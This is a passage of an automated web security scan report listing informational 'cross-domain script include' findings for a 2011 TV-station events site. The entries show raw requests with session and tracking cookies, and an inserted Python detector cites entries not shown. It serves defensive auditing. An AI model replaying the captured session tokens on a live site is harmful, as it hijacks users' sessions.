<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.199. http://events.cbs6albany.com/saratoga-springs-ny/events/show/163979845-intimate-encounters-for-valentines

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /saratoga-springs-ny/events/show/163979845-intimate-encounters-for-valentines

Issue detail

The response dynamically includes the following scripts from other domains (as seen in the response excerpt below):

http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js

Request

GET /saratoga-springs-ny/events/show/163979845-intimate-encounters-for-valentines HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:00 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 124
ETag: "73fd09c11fc28463d08fc357da863fe5"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:48:00 GMT; HttpOnly
Content-Length: 40890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.200. http://events.cbs6albany.com/schenectady-ny/events/show/163204745-be-my-valentine

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /schenectady-ny/events/show/163204745-be-my-valentine

Issue detail

The response dynamically includes the following scripts from other domains (as seen in the response excerpt below):

http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js

Request

GET /schenectady-ny/events/show/163204745-be-my-valentine HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:47:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 93
ETag: "3d6eb6d53960a37b95426325a922e95d"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:47:55 GMT; HttpOnly
Content-Length: 43520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.201. http://events.cbs6albany.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains (as seen in the response excerpt below):

http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://pagead2.googlesyndication.com/pagead/show_ads.js (included twice)
http://edge.quantserve.com/quant.js

Request

GET /search HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:38:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 381
ETag: "3d4a042143386ff03816bdf1f2630c20"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iACILYnVja2V0RiINbG9jYXRpb257ECIJY2l0eSILQWxiYW55IgtyYWRpdXNpNyINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciD0FsYmFueSwgTlkiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy03My43NTUwOTk5OTk5OTk5OTkATWoiEXdoZXJlX3N0cmluZ0AZIgpzdGF0ZSIHTlk%3D--d0710e9458c36d53e23b3e7a161be20e00b58652; path=/; expires=Fri, 29-Apr-2011 05:38:15 GMT; HttpOnly
Content-Length: 56757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta name="description" content="Search results" />


<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.202. http://events.cbs6albany.com/support/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /support/contact

Issue detail

The response dynamically includes the following scripts from other domains (as seen in the response excerpt below):

http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://api.recaptcha.net/challenge?k=6Lc1yAQAAAAAAJ_UKIhg2wqlBgWoIRK7Y1hHFRfK
http://edge.quantserve.com/quant.js

Request

GET /support/contact HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:42:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 19
ETag: "ccaba8c14b60dabccfaa72fb1c1854ee"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7CDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05ZOgxyY2NfZXJyIgA%3D--10871e79e903b2058907b0402c06ef0f24c4591b; path=/; expires=Fri, 29-Apr-2011 05:42:57 GMT; HttpOnly
Content-Length: 21713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta name="description" content="Thanks for using WRGB Event Calendar! If you have any comments or questions please contact us using the form below. We'll get back to you as soon as we can." />


<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Lc1yAQAAAAAAJ_UKIhg2wqlBgWoIRK7Y1hHFRfK"> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.203. http://events.cbs6albany.com/support/content_guidelines

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /support/content_guidelines

Issue detail

The response dynamically includes the following scripts from other domains (as seen in the response excerpt below):

http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js

Request

GET /support/content_guidelines HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:43:47 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 27
ETag: "91a72f0ad435f1101a23b6320cb54e9f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:43:47 GMT; HttpOnly
Content-Length: 15446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
to find and post events, concerts, festivals, live music, and other things to do near you. Zvents is a free search engine where you can search for what to do by location, time, or event type." />


<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
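
As an added example (not code from the crawler report or from any of the sites it lists), the following Python re-implements the check behind these "cross-domain script include" findings: it pulls every `<script src>` out of a response body, works out which host each script is fetched from, and lists the ones whose registrable domain differs from the page's. It also catches script tags emitted through `document.write(...)` in a JavaScript response, as in entry 18.208. The sample body is constructed from the script tags shown in entries 18.210 and 18.205; the relative, protocol-relative and `static.jqueryui.com` sources are invented to exercise the same-origin paths. The registrable-domain heuristic (last two labels rather than the Public Suffix List) and the Subresource Integrity check are simplifications and additions of this example, not part of the original scan.

```python
"""Flag cross-domain <script src> includes in an HTTP response body.

Added example (not code from the crawler report): re-implements the
check behind the "cross-domain script include" findings above.
"""
import re
from urllib.parse import urlsplit

# One opening <script ...> tag, whether it sits in HTML or inside a
# document.write('...') string in a JavaScript response (cf. 18.208).
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>", re.IGNORECASE)
# src attribute with double, single or no quotes.
SRC_RE = re.compile(r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
                    re.IGNORECASE)
# Subresource Integrity attribute: a later mitigation, flagged here as an
# addition of this example; the 2011 scan did not look for it.
INTEGRITY_RE = re.compile(r"\bintegrity\s*=", re.IGNORECASE)


def registrable_domain(host: str) -> str:
    """Approximate the registrable domain as the last two DNS labels.

    Assumption/simplification: a production check should consult the
    Public Suffix List so that hosts under e.g. 'co.uk' are handled.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def script_host(src: str, page_host: str) -> str:
    """Host a script src is fetched from; a src with no host is same-origin."""
    parts = urlsplit(src.strip())
    return parts.hostname or page_host


def find_cross_domain_scripts(page_host: str, body: str) -> list:
    """Return one dict per script fetched from a different registrable domain."""
    findings = []
    for tag in SCRIPT_TAG_RE.findall(body):
        m = SRC_RE.search(tag)
        if not m:
            continue  # inline script: nothing is fetched
        src = next(g for g in m.groups() if g is not None)
        host = script_host(src, page_host)
        if registrable_domain(host) != registrable_domain(page_host):
            findings.append({"src": src, "host": host,
                             "sri": bool(INTEGRITY_RE.search(tag))})
    return findings


def format_report(page_host: str, body: str) -> str:
    """Render the findings in the same wording the crawler report uses."""
    found = find_cross_domain_scripts(page_host, body)
    if not found:
        return "The response includes no scripts from other domains."
    lines = ["The response dynamically includes the following scripts "
             "from other domains:"]
    for f in found:
        note = "" if f["sri"] else "  (no integrity attribute)"
        lines.append(f"  {f['src']}{note}")
    return "\n".join(lines)


# Constructed sample, modelled on the script tags shown in 18.210 and
# 18.205; the relative, protocol-relative and static.jqueryui.com entries
# are invented to exercise the same-origin paths.
SAMPLE_HOST = "jqueryui.com"
SAMPLE_BODY = """<!DOCTYPE html>
<html><head>
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller" type="text/css" media="all" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
<script src="/themeroller/scripts/local.js" type="text/javascript"></script>
<script src='//static.jqueryui.com/shared.js'></script>
<script type="text/javascript">var inline = 1;</script>
</head><body>
<script>document.write('<script type="text/javascript" src="http://edge.quantserve.com/quant.js"><' + '/script>');</script>
</body></html>
"""

if __name__ == "__main__":
    print(format_report(SAMPLE_HOST, SAMPLE_BODY))
```

Every script loaded this way executes with the including page's origin, so a compromise of the third-party host, or of the DNS or transport path to it (every include in these findings is fetched over plain http), is a compromise of the page. That is why a finding the scanner rates as "Information" still deserves triage: the question is not whether the include exists but whether the page trusts that host with its users' sessions.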

18.204. http://events.cbs6albany.com/support/help

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /support/help

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/help HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:43:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 22
